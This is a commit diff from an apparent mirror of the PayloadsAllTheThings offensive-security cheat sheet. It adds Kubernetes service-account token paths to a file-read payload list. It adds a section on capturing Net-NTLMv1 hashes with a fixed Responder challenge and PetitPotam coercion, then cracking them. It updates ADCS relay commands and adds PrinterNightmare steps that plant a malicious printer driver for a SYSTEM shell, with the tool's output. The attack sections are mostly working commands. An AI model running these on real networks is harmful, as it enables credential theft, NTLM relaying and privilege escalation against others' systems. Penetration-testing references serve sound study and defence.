mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
Net-NTLMv1 + DriverPrinter
This commit is contained in:
parent
0f94adafe5
commit
c8076e99c9
@ -125,6 +125,9 @@ To bypass this behaviour just add forward slashes in front of the url:
|
|||||||
/proc/self/cwd/main.py
|
/proc/self/cwd/main.py
|
||||||
/home/$USER/.bash_history
|
/home/$USER/.bash_history
|
||||||
/home/$USER/.ssh/id_rsa
|
/home/$USER/.ssh/id_rsa
|
||||||
|
/run/secrets/kubernetes.io/serviceaccount/token
|
||||||
|
/run/secrets/kubernetes.io/serviceaccount/namespace
|
||||||
|
/run/secrets/kubernetes.io/serviceaccount/certificate
|
||||||
/var/run/secrets/kubernetes.io/serviceaccount
|
/var/run/secrets/kubernetes.io/serviceaccount
|
||||||
/var/lib/mlocate/mlocate.db
|
/var/lib/mlocate/mlocate.db
|
||||||
/var/lib/mlocate.db
|
/var/lib/mlocate.db
|
||||||
|
@ -58,7 +58,8 @@
|
|||||||
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||||
- [Using impacket](#using-impacket)
|
- [Using impacket](#using-impacket)
|
||||||
- [Using Rubeus](#using-rubeus)
|
- [Using Rubeus](#using-rubeus)
|
||||||
- [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
- [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes)
|
||||||
|
- [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
|
||||||
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
|
- [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
|
||||||
- [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
- [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||||
- [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
|
- [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
|
||||||
@ -1665,7 +1666,39 @@ klist
|
|||||||
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
|
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
### Capturing and cracking NTLMv2 hashes
|
|
||||||
|
|
||||||
|
### Capturing and cracking Net-NTLMv1/NTLMv1 hashes
|
||||||
|
|
||||||
|
> Net-NTLM (NTLMv1) hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user's NT hash.
|
||||||
|
|
||||||
|
:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine, to get the machine account Net-NTLM v1 hash
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`)
|
||||||
|
|
||||||
|
|
||||||
|
* Capturing using Responder: Edit the /etc/responder/Responder.conf file to include the magical **1122334455667788** challenge
|
||||||
|
```ps1
|
||||||
|
HTTPS = On
|
||||||
|
DNS = On
|
||||||
|
LDAP = On
|
||||||
|
...
|
||||||
|
; Custom challenge.
|
||||||
|
; Use "Random" for generating a random challenge for each requests (Default)
|
||||||
|
Challenge = 1122334455667788
|
||||||
|
```
|
||||||
|
* Fire Responder: `responder -I eth0 --lm`
|
||||||
|
* If you got some `NTLMv1 hashes`, you need to format then submit them on [crack.sh](https://crack.sh/netntlm/), or crack them with Hashcat/John
|
||||||
|
```ps1
|
||||||
|
username::hostname:response:response:challenge -> NTHASH:response
|
||||||
|
NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972
|
||||||
|
```
|
||||||
|
|
||||||
|
:warning: NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used.
|
||||||
|
|
||||||
|
|
||||||
|
### Capturing and cracking Net-NTLMv2/NTLMv2 hashes
|
||||||
|
|
||||||
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
|
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
|
||||||
|
|
||||||
@ -1680,6 +1713,7 @@ PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y
|
|||||||
PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y
|
PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Man-in-the-Middle attacks & relaying
|
### Man-in-the-Middle attacks & relaying
|
||||||
|
|
||||||
NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
||||||
@ -1921,8 +1955,9 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
|||||||
* Version 1: NTLM Relay + Rubeus + PetitPotam
|
* Version 1: NTLM Relay + Rubeus + PetitPotam
|
||||||
```powershell
|
```powershell
|
||||||
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
||||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template workstation
|
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
|
||||||
# Templates: workstation, DomainController, Machine; KerberosAuthentication
|
# For a member server or workstation, the template would be "Computer".
|
||||||
|
# Other templates: workstation, DomainController, Machine, KerberosAuthentication
|
||||||
|
|
||||||
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
|
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
|
||||||
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
|
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
|
||||||
|
@ -35,7 +35,7 @@
|
|||||||
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
|
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
|
||||||
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
|
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
|
||||||
* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
|
* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
|
||||||
* [EoP - Printers](#eop-printers)
|
* [EoP - Printers](#eop---printers)
|
||||||
* [Universal Printer](#universal-printer)
|
* [Universal Printer](#universal-printer)
|
||||||
* [Bring Your Own Vulnerability](#bring-your-own-vulnerability)
|
* [Bring Your Own Vulnerability](#bring-your-own-vulnerability)
|
||||||
* [EoP - Runas](#eop---runas)
|
* [EoP - Runas](#eop---runas)
|
||||||
@ -999,6 +999,30 @@ Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
|
|||||||
Add-Printer -ConnectionName $fullprinterName
|
Add-Printer -ConnectionName $fullprinterName
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### PrinterNightmare
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
git clone https://github.com/Flangvik/DeployPrinterNightmare
|
||||||
|
PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell
|
||||||
|
[<3] @Flangvik - TrustedSec
|
||||||
|
[+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll
|
||||||
|
[+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll
|
||||||
|
[+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll
|
||||||
|
[+] Adding printer driver => Generic / Text Only!
|
||||||
|
[+] Adding printer => EasySystemShell!
|
||||||
|
[+] Setting 64-bit Registry key
|
||||||
|
[+] Setting 32-bit Registry key
|
||||||
|
[+] Setting '*' Registry key
|
||||||
|
```
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
PS C:\target> $serverName = 'printer-installed-host'
|
||||||
|
PS C:\target> $printerName = 'EasySystemShell'
|
||||||
|
PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
|
||||||
|
PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
|
||||||
|
PS C:\target> Add-Printer -ConnectionName $fullprinterName
|
||||||
|
```
|
||||||
|
|
||||||
### Bring Your Own Vulnerability
|
### Bring Your Own Vulnerability
|
||||||
|
|
||||||
Concealed Position : https://github.com/jacob-baines/concealed_position
|
Concealed Position : https://github.com/jacob-baines/concealed_position
|
||||||
|
Loading…
Reference in New Issue
Block a user